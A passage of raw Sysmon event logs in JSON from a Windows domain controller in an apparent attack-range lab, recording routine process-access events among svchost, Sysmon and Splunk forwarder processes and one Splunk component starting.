(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.440","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5835,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.440\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.440","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5836,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.440\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.440","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5837,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.440\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.440","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5838,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.440\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.440","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5839,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.440\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.440","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5840,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.440\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0372-5F25-0000-00108BE40A00}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.440","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0372-5F25-0000-00108BE40A00}","TargetProcessId":"4660","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5841,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:54.581\r\nSourceProcessGUID: {A837DB8D-0372-5F25-0000-00108BE40A00}\r\nSourceProcessId: 4660\r\nSourceThreadId: 4748\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:53:54.581","SourceProcessGUID":"{A837DB8D-0372-5F25-0000-00108BE40A00}","SourceProcessId":"4660","SourceThreadId":"4748","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:53:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5842,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.675\r\nProcessGuid: {A837DB8D-0373-5F25-0000-0010D4E60A00}\r\nProcessId: 1540\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:53:55.675","ProcessGuid":"{A837DB8D-0373-5F25-0000-0010D4E60A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:53:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:53:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5843,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:53:55.674\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program 